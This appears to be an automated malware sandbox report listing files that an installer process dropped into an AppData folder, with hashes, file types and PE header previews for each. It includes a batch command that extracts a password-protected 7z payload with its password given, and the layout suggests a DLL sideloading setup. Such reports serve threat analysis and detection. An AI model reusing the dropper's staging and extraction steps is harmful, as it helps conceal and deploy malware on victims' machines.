                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):356864
                              Entropy (8bit):6.703452536404214
                              Encrypted:false
                              SSDEEP:6144:a/SEW2qJHtVqYEJ6pdMZT6KWm1xA+Mko22Anui5j:kI9tV3EMpdQGRwA+92Uj
                              MD5:7C220C7186368E299FA81FBFF8290064
                              SHA1:F18BB3A1ADF29F8CF556B4D02D44F668537964F6
                              SHA-256:742395A3BBB5700067955BA70E29BE33C45C35A25705A071B472FDBBB1523070
                              SHA-512:48CA2D90714E071357B8CDAE2883633F78964D85ED1C45883794A42F160B754110050E7D5706F7C359448D45F2B8627CF2999D4351302A7073F8D930C101C50B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6@..r!..r!..r!..{Ys..!..fJ.c!..r!.. ..fJ.a!..fJ.x!..fJ.v!..fJ..s!..fJ.[!..fJ..s!..fJ.s!..Richr!..........................PE..L...h>.............!.....|................................................................@A.............................................p...................p..TI.. m..T............................ ..........................@....................text....{.......|.................. ..`.data...T...........................@....idata..^0.......2..................@..@.didat..............................@....rsrc....p.......r..................@..@.reloc..TI...p...J...(..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):888832
                              Entropy (8bit):6.658891755289535
                              Encrypted:false
                              SSDEEP:12288:qq+D5IECD3N0TU++ekdhBHUESG+IAafpR2hZz8PC2CQh3Y+EkwVWFvhXX:fECD9j++ekR0JG5AaBmzqhpY+ELUhH
                              MD5:5E7C062BDE54ED88A639A889A1695318
                              SHA1:3A8548093D0E795FBF5E3C972D1EF28CEA76374D
                              SHA-256:318CA8E2AE5ECDBB0A7E10AE90B317C09D9C425758D530FFD54110CE1121088C
                              SHA-512:4609F791DEF263D03FDB57068B626582437E2598BCF77B68456DD2C2C7FE855FF2E71FF555B313BA0E94FADCDC2DC105DA95DC9E566E11369D5C8AF1A98A3A1B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uH..uH..uH...H..uH..qI..uH..vI..uH..tH..uH..tI..uH..pI..uH..uI..uH..|I:.uH...H..uH..wI..uHRich..uH................PE..L......=...........!.....R...V...............p...........................................@A........................pa..l......X.......P........................... >..T............................>.......................V.......................text....Q.......R.................. ..`.data....(...p.......V..............@....idata...............d..............@..@.didat..`............|..............@....rsrc...P............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):398336
                              Entropy (8bit):7.1846894828937105
                              Encrypted:false
                              SSDEEP:12288:E15s2/azNQo8oT1EWDEkO6VzZF9uyHLjlHf:o/2CFPkDVzZF9uyHtHf
                              MD5:3FA8077C9C6A769B3BD88800E818BDF6
                              SHA1:7A1E69172E18831FBA28026BE7A24355354713B5
                              SHA-256:1D1FF5C14D8DD0C0F93A2C3DBFC7369E542DEF86C4E4E21659B847C43420C4C3
                              SHA-512:5C4DACFC5D34940F3ABA62A641398ABEA5CA94622EEFD850F902575A43647CB67CFE4091661ACB3710F242FAE2F6FB0E875D679286ABF6C5F38B0CF8572FE1AE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F.s..s..s......s...w...s...p..s..r.`.s...r..s...v..s...s..s...z...s.....s...q..s.Rich.s.........................PE..L...S;Y............!................@........0...............................P............@A.........................%............... ..X....................0..`... Z..T....................................................$..@....................text............................... ..`.data........0......................@....idata..............................@..@.didat..............................@....rsrc...X.... ......................@..@.reloc..`....0......................@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):264992
                              Entropy (8bit):6.422639874613466
                              Encrypted:false
                              SSDEEP:6144:4i7RSMUw32CszCxRBL17SxvZiPk7H0FsoTVC7Rr:b9p25z+J7v8H0Fso2Rr
                              MD5:5F5E63F6EB6BADA4051AE5B3ADE35C95
                              SHA1:9925C1A5DD98CC0D24F2DB35E75C6FA3512B6BB0
                              SHA-256:5B40BE2B83DE58C9C787D9E97D218EC3CECECEE30CA884CD7A3B45D60A9F2FD9
                              SHA-512:7835DD94B14286FB55EEADCDF1C675C3674A3AE1F94D5A4DB141D9C08E2423EF70DC18C48FFD1EADEB2BFB37D89E435268D80C4E41DA771E0123AC87BBB1C3A0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4/W.Z|W.Z|W.Z|^..|u.Z|C.^}X.Z|W.[|..Z|C.[}P.Z|C._}U.Z|C.Y}S.Z|C.Z}V.Z|C.S}r.Z|C..|V.Z|C.X}V.Z|RichW.Z|................PE..L..................!.........|...............................................@.......@....@A........................p.......`...........H............... /... .......'..T...............................................\.......`....................text...-........................... ..`.data...0J.......&..................@....idata..............................@..@.didat..............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):27648
                              Entropy (8bit):5.776086876326118
                              Encrypted:false
                              SSDEEP:768:vpWhWBPbF7QQWWKmk2sBED0U3bjlkZHp9Tw:0hcR7QQ5C3MH+ZHp9s
                              MD5:D2BC6AE376BA560FD67B402E2A97F4CA
                              SHA1:5F6C77A427921A22F6FDFAC4460F44BCC9A89F83
                              SHA-256:41BACE37D18E89539DDA9846AC0AF6ED4733282B01EE99AD735C1638391BF4C3
                              SHA-512:7B5251FCB069AA90DD178AFBB7F405B4737C75ACDFBB28215FBEF1F92F3BC47C24428542C4DB81E2F7E10D865A04FE4A8D404A88D7CE5D491B7D6E1B6F1C95D2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xr..<.`A<.`A<.`A5k.A*.`A(xe@=.`A(xc@=.`A(xd@).`A(xa@3.`A<.aA..`A(xi@0.`A(x.A=.`A(xb@=.`ARich<.`A................PE..L....@..................D...P......pJ.......`....@..................................j....@...... ..............................@.......................................T...........................x.......................|Q..`....................text...DB.......D.................. ..`.data...H,...`.......H..............@....idata..8............J..............@..@.didat...............Z..............@....rsrc................\..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):3756821
                              Entropy (8bit):7.999950735502969
                              Encrypted:true
                              SSDEEP:49152:SPX5+ecyESLsnN+9/mWfUrkNI7YXv4o4pZ54jEoET6aH2xIuueh26VmQ9FTdPTfQ:SPpLqm/mwUQNI7Zp8xTw6vRPTbSclMj
                              MD5:ADF5C26373A00E49DFC8B59678A26851
                              SHA1:5E0D3E43187E8652FE6B7E898AD666C2939F3C38
                              SHA-256:D009598D6F687532EB734A222D9C0D7EAA179655F736F7A7DD3A2DCB7FAB4AD7
                              SHA-512:ADA9E3C6A9EB49ADCCDC07D30B1A3994C84DE0C9DF93EC365D2396E0C06472C31A6FE2BBA45930DC2B384DC36FFF7D858F1692DCE6DCF57A8543F7F86CA5D70E
                              Malicious:false
                              Preview:7z..'...{T.b.R9.....%.......5b..a..f..B.._Yw"#g...V.y......Q...~..n...n.y..|.W\.$..{...q.w}v.0...1()%"!....b+...Fs..%.......R..1.zp.>G...^.q..Uo..,..1.J..Q..rWUl...@...*.12.7]Z..>>&b...-..........p......./H..<..K+.d.!.3Q$l..."IZ.$.*.6nV....G..[h0....:.`....p.....8ro........w...M.P.../.<....J.Sb...^!.3WH.*.....r*..'..I@..P....P7..{.mG.;....*f.C..?...z_22.N;^.k...$PS-......&.^.......[*y........f.>.....U{k.t# .......`...w.E.hhh......&cX...gIMvd...o_.*.gAeO.X..J..%......f1W...q.n....4..t"....W?...&.S.E..h...*<....:-.. s..R....IY.......))..(.l....F..{. x%..P..I;I.._KKC..$.."......I.q...9sG(..^..P..F..V9=.....tc..4....-......eB.......xY..,.i.Z..&=W.b.).u7DweL W...5c.}...'e..|.qnJs.R.....*......k...u_*....yV.?).s.bg..D.v...@ka....<..D..\U92`.m......R..Qp.h...H..Q..........'..h..!.......a...P.R...-Lk.n.R...A..[..A..PG.@..=...z>."..[k........P.`9.;..N........*..A-..).fH.s1l..w.H3.w...G.p.p|.Q.n..._.9..D2...tC.^o..Q.W.U.^f.....,..A...+.Y].b%.q.....b.^...$

                              C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):169
                              Entropy (8bit):4.897115970448875
                              Encrypted:false
                              SSDEEP:3:I5Pt+kiEaKC5ysLvdFnoNt+kiEaKC5yt0RaStYVSQcYQyXWOt+kiEaKC5yH:INwknaZ5lgwknaZ5QwhC4xrOwknaZ5U
                              MD5:E2E49E39DB4BDC339703AF8EBD811AAD
                              SHA1:43F67BF0B927D0063FA023B4C79D993481E512DB
                              SHA-256:B99D5FCCD4318A81C6B68397670C963E9434A9EFF76C630DBD2A69DDBF31F8A3
                              SHA-512:BD5228AE9853F71454B4EBD6ACE55BEAFD2845A53C9705BEA7E1125588AC75A551A141D9DC205134ECB2CD03A3BE2A25A4D0DBE4B57CB4C18AAD6B48014345AA
                              Malicious:false
                              Preview:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"

                              C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.txt

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):3.8841837197791884
                              Encrypted:false
                              SSDEEP:3:QSM3r9:Hkr9
                              MD5:D2EC38A2F034052124ABC5DE27A0CF08
                              SHA1:198CECE15DDA469855FABACC38041A04626EDA24
                              SHA-256:DCA33C88066644EE5A99AECE0DEE86830AD7811AADDF677E514F4C08AE578CB5
                              SHA-512:7D9859168435276ECDCAFF43906AF949AE9863A11E30D74965E88C64A06D951723DFC1BAD5641474C24FF13079FA7D0142D18B89F88F6FBA7DAC499F1C6D501F
                              Malicious:false
                              Preview:parsec-windows.exe..

                              C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):17408
                              Entropy (8bit):5.099127756403988
                              Encrypted:false
                              SSDEEP:192:lzZ1jWp6XwpkG1ThzQosFRi2gKp8W+YAUtpu1KAgsPzKbMq/YWqB/WcNwGOUf:De9Nhei2gS8W+YAUts1V2oPWqB/WEOU
                              MD5:BE2A0F4DFE1DF0C0A095C05787421510
                              SHA1:521A6F5F4268C0E560075F81760AFED0E22E9C56
                              SHA-256:B46D21E8758624D184A063B2C021AEFFF45CA0C33AECC8840829F16E8E32B43A
                              SHA-512:60955C89F4E56FDA473CF756C04B75B59AFFCF8600380ABA3E12DC41B6E0B370FF04B6320D05FFECBDD7994455796B1CD7DA96BBBCF4948DFE74C3B75974296D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y..m...x..m...u..y..E..m...r..m...x..m...z..m.X.x..m...x..Richy..................PE..L....[*7...........!.................3.......@......................................~n....@A........................ =.......P..x....`..8....................p.......-..T...........................P...@............P...............................text....-.......................... ..`.data........@.......2..............@....idata.......P.......4..............@..@.rsrc...8....`.......:..............@..@.reloc.......p.......@..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):21504
                              Entropy (8bit):5.437181553041295
                              Encrypted:false
                              SSDEEP:384:ATE5/wpuI8sgqzptH/b3wGK0LTOefJoJA1FwPWuxWp:NmjppbNlxfJoJALwZe
                              MD5:3417CBAB13CD103B5AEE4D4EF297C240
                              SHA1:2BBBB44DD6592701B749DC352A98DBA7642712F2
                              SHA-256:5BEB57FFFC92BCB5FBD8AFD8B2E09EDAE93E895BB9A4604C010EB377930813AD
                              SHA-512:5A14F422D5E5F292C914D07A083E736B1F33D7CF98C72388F87488C431379FBC70CACB1DC25A97B3887FC35E1E9B7ACF03A9329B355001F7CCAACB0D5CA0F2E3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;&...G.P.G.P.G.Pv?ZPiG.Pk,.Q~G.Pk,.QrG.P.G.PFG.Pk,.QzG.Pk,.Q|G.Pk,.Q~G.Pk,.Q|G.Pk,6P~G.Pk,.Q~G.PRich.G.P........................PE..L...V.P...........!.....8.......... ........P......................................r.....@A.........................>.......`..........`...............................T...........................p................`.......=..`....................text....7.......8.................. ..`.data........P.......<..............@....idata.......`.......>..............@..@.didat.......p.......H..............@....rsrc...`............J..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):224256
                              Entropy (8bit):6.25795248247157
                              Encrypted:false
                              SSDEEP:6144:5jjuLdC4oe1TV5BwAeK0bT6GkwbQpwsYGGM5:5ja2ev3wAeKAu3OsT5
                              MD5:86C95709715D9EB0ED4BEBC6AF6153C0
                              SHA1:2ED10D1B00C98DB7E265883E03C0A63D422E23B2
                              SHA-256:4A842E92B17A982D98BEEDF5E25B371E2BE3A0D6939A5A256E2B3066D1B53A16
                              SHA-512:180598CA8318CA2DA688740F5BC3C3CB5D684C8E2EAD036E800E77EBF749EBEC50D5D8A76A58166C8A6918D63EDA17DD105A06CAD3FE2AA52EC5E5A80FAF838D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{..y?..*?..*?..*6..*)..*+.+;..*+.+3..*?..*#..*+.+6..*+.+...*+.+#..*+.c*>..*+.a*>..*+.+>..*Rich?..*........PE..L....e..................."...N......0........@....@..................................b....@...... ..........................,S.......p.. .......................h"..P...T............................%...............P..(............................text...x!.......".................. ..`.data........@.......&..............@....idata..2....P.......(..............@..@.rsrc... ....p.......F..............@..@.reloc..h".......$...H..............@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):88576
                              Entropy (8bit):6.314245127753692
                              Encrypted:false
                              SSDEEP:1536:mw7cep4vTkKL9El0Zsl/0W7f1/D5cigpoFTtOxGtIWo4fv0vwcQ:mLepXKBPW7f1BgmFTt24fKwcQ
                              MD5:EC617981C8A1ECFD4E982DC222D702C4
                              SHA1:08662D14313DF78CD3A62FEDA10673FA61DE93B4
                              SHA-256:8507C144A2C8A734AF66A8BE601B819943F931EF31A5244381DB359AB7714BB1
                              SHA-512:126B30D460DB356AD83C848B18F885032FB7C55483E51D9096BD172839E07FF1063B796BC2E3DFE8596A192AAA9C80D054441F2CAFEBB05F53421CE94F2D6A62
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........OC...C...C...J.W.....W...@...C.......W...F...W...O...W...B...W...N...W..._...W.9.B...W.;.B...W...B...RichC...........PE..L.....I............!..... ...:...... ........0.......................................=....@A........................ /..x...8B..X....p...............................(..T...........................h................@..4....-.......................text............ .................. ..`.data........0.......$..............@....idata.......@.......(..............@..@.didat..$....`.......<..............@....rsrc........p.......>..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):8192
                              Entropy (8bit):3.645665042318358
                              Encrypted:false
                              SSDEEP:96:Orl+urtFDjM60maJGSarulzaYnLakA6wpywK+eXS24eSEWr9wWwMY:Or7bjV3SxzfnLm6wpa5p4qWhwW
                              MD5:29D29296A6532A4964014A3173C91A3A
                              SHA1:0E5CDE29F773F952519EA10DAB24E922962663D7
                              SHA-256:75743713ADAE119D2AFFA85588EECB5415D8975AAF0BE65798CB58FEF1317600
                              SHA-512:DC3D99CBD82B04ED2CBC42256E2C32DC881B45C8DAB16971AC84F35EA8C15CDD7179EB7EBE720B1EC961CC35E341DEF406F280B541498A261736F57399D30F24
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....X............!.........................................................@......F.....@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......X.........T...8...8.........X.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... ....02.......Z7.CGu.W.9..p~iv....X.........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):249856
                              Entropy (8bit):6.618708464341655
                              Encrypted:false
                              SSDEEP:3072:nBFO+6Zhxp7sZcX65P/RkReY41OjF92BMoygqvoJYxL5ZcOJDJN6RH6C78:nB4jZ7pehkYY4y7gqvnxlZcEDn6RLw
                              MD5:CB3AF0211D68FF4EC460D2DD89A25E8D
                              SHA1:38D0214D072E8F80AC9EAFF54B8E2D1E3B1042A7
                              SHA-256:FACB0C90EBD99FA9626D1FBA44DB025F737CA13C9E71AFADD60155E7A6AC8E29
                              SHA-512:D387996162EBA673E8A2031DE6701A242AF87469162A215D3034AE80B6C556203E4A100942208D3BB540212377BA5F2BC83B83D931BB9C37D5AF3A3FD8DB9961
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G....u.,.u.,.u.,..S,Ou.,...-.u.,...-.u.,.u.,.w.,...-.u.,...-.u.,...-.u.,...-%u.,..?,.u.,...-.u.,Rich.u.,................PE..L.....p............!.....>..........0........P............................... ......|.....@A.........................L......Pd..........x!.......................@...]..T....................'......`&...............`..L............................text....=.......>.................. ..`.data........P.......B..............@....idata.."!...`..."...F..............@..@.didat...............h..............@....rsrc...x!......."...l..............@..@.reloc...@.......B..................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):13312
                              Entropy (8bit):4.892826616280507
                              Encrypted:false
                              SSDEEP:192:gxfhLX5M7OQL44G7Y5SA3h/frhEcCZVvWsP8g3MWq/:e5NTQL44G7YLxryZlWsP8g3MWs
                              MD5:B248B9CE808EEC990F63FBB3B30862EB
                              SHA1:A1C61C2D8A148D2D80E60FC2A55F4CCCAEF91518
                              SHA-256:A813212F242A4C2673ADB62EDD0953FF9F48BA3303AA7093E96E36320797BAD8
                              SHA-512:2A7C511D1A482F306D65C49ECBFF126084D0079CF396F3F0DE01B3460E1A75D90841964CD43F3DB702BC0532BD2D829DF49115C6AE210862546567AD26F2D428
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&.@.H.@.H.@.H.I...R.H.T.K.A.H.T.L.L.H.@.I.q.H.T.I.C.H.T.H.A.H.T.@.E.H.T..A.H.T.J.A.H.Rich@.H.........PE..L...l0X............!................. .......0...............................p.......Z....@A........................p).......@.......P..8....................`...... ...T...........................8................@...............................text............................... ..`.data...`....0....... ..............@....idata.......@......."..............@..@.rsrc...8....P.......*..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):11776
                              Entropy (8bit):4.616246965122149
                              Encrypted:false
                              SSDEEP:192:plvzZj/2YI5to2rwyYXdL93EcNZzWPoozWB1:5j/2YI5C2r5YXdL9rZzWPo0Wv
                              MD5:062B973C9183EC3309A986B5657377CC
                              SHA1:DFF23CEC6F477F292BE99EDB12F2AC8069FD3A7F
                              SHA-256:C17AE52F0447A7B1E7150849260A7B0F05786BB275A03D6E4F4B2663F332D715
                              SHA-512:B16E619A42C9D84076AD4AFB4A01FE3B735769E35F8D73CD84CEEC423FA2FE0BDD5155A4C24047DB7C8C2EE43B2592FBF944EE6714F1A4A47DC116CB38DCF081
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... u..d...d...d...mld.t...p...e...p..i...d...}...p...g...p...e...p...f...p...e...p...e...Richd...................PE..L....AO............!................0........0............................................@A........................@"..A...t@.......`..@....................p..h.......T............................................@..p....!..@....................text............................... ..`.data...T....0......................@....idata..`....@......................@..@.didat.......P.......$..............@....rsrc...@....`.......&..............@..@.reloc..h....p.......,..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):615424
                              Entropy (8bit):6.486463968251161
                              Encrypted:false
                              SSDEEP:6144:9LBMhWV4vkP/vhYsCrnLtnG3Fypb2dZjD0L9XlZXzfUD+ml5oCEGcmC0W0qj9rnv:9LBMhWV4vkPis8nLlY6k+mTBCtmA
                              MD5:6A2E421022720242F2275E9C2011C185
                              SHA1:03FEFC6077DC0AE418F74C344C44AEB8E9140CE7
                              SHA-256:C83C9F5BE7ADAC1820C54A4B345E91745EA7F46990855E0C1A39A35FF27AE2ED
                              SHA-512:DF8A5D8350F7C366AAA417DC5E0A326C66DB6037527C1664912F2ADFAA8AADE142F0589E358AF9E2D9811756B5F6E10730E543804524B9B9C91234D2E788463C
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........E.k.E.k.E.k.L...}.k.Q.h.@.k.Q.o.I.k.E.j..k.Q.j.B.k.Q.k.D.k.Q.b.T.k.Q.n.X.k.Q...D.k.Q...D.k.Q.i.D.k.RichE.k.................PE..L....."............!.....F... ......0........`.......................................>....@A.........................T.........X.......h........................... y..T....................m...... m...............................................text...1E.......F.................. ..`.data........`.......J..............@....idata...............`..............@..@.rsrc...h............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):999424
                              Entropy (8bit):6.74144786926542
                              Encrypted:false
                              SSDEEP:24576:uMYkn2ijHDlBUO4wYElIGS8wz5KKjggXiMf43GZL:Ik2iTUGShM3G1
                              MD5:2392FFC039A33076BB34F4498F66F145
                              SHA1:EA248B00D3CF7CCBCCFEBEC808690EAFF00D31E9
                              SHA-256:0E3BDCF8631BBDEE53347A2F1DB37998D7079F646C66E110D890F83E3D63731C
                              SHA-512:B70143A646B357B7AE4E9CB7BDEB83C9AD7DCFCAA1927C7DD891470BF64372B764478BBCBBE214ACD1148E6E6164B0F0B1DAAF31BE25C3E4124C6B003EC0E7E1
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BI...(...(...(...Pi.H(...C...(...C...(...(...)...C...(...C...(...C...(...C..C(...C...(...C...(..Rich.(..................PE..L...#4.8...........!.........f......@........................................0...........@A............................................................H..............T............................i......................L... ....................text.............................. ..`.data...L...........................@....idata...%.......&..................@..@.didat..............................@....rsrc...............................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):26112
                              Entropy (8bit):6.067632829123416
                              Encrypted:false
                              SSDEEP:768:Uiora7O3sp942cRR/aay7rSEaxyIfZOZVDdbc385:UioO7e+zUR/ad1KyIfZOZVRbc385
                              MD5:267D4B93BE248D3CE10DF54C4CD2C57C
                              SHA1:1E7E19158EBFF8BC43BE1E19C8E5D66A50874FFC
                              SHA-256:BA3786CF09C00CA427859093D8D86EFE19B1B64F957C066834EFD8966C9DBEB2
                              SHA-512:D0EC2777AC879AA124E86E0E4317CA6B92CFD838581695260D1062730049EA5EFD63309F98E9EE3E52EF59512AF959AF4B72006E3F5BA925057C99FE33391C9A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L<@.-R..-R..-R..FQ..-R..FV..-R..-S..-R..FS..-R..FR..-R..F[..-R..F...-R..FP..-R.Rich.-R.........................PE..L.../.U............!.....D..."......@G.......`....Hd................................Y.....@A........................pO......lq..........`...............................T............................................p..h............................text...+B.......D.................. ..`.data........`.......H..............@....idata.."....p.......P..............@..@.rsrc...`............\..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):97792
                              Entropy (8bit):6.59754817112535
                              Encrypted:false
                              SSDEEP:1536:B8lLdQjbkHMmGHvH74UkwC6EVZ8sm+WjQ+WMMl1M4WAki91BuGJEfXlIQBj:+1dQvkHXGHvb4UBC3VZ8smS9l1M4WAk1
                              MD5:331BA50FC802AA0467074D019AD77D46
                              SHA1:B333DE90D1BFC891CB6D85EAE8EB8D115FB5FFAC
                              SHA-256:AE88C9C998234A26A6C327F5A8A4F6C576F8AC4BF54A96A50D8C17539E16C0F7
                              SHA-512:46CB251BA4344DF190E675F0F80E3906FAE5455752ABAA176750706BF01EA27D6F2123E2366A160EFE32D5B5E8FA993FB245C1022977DC92E38187AFBDF4840E
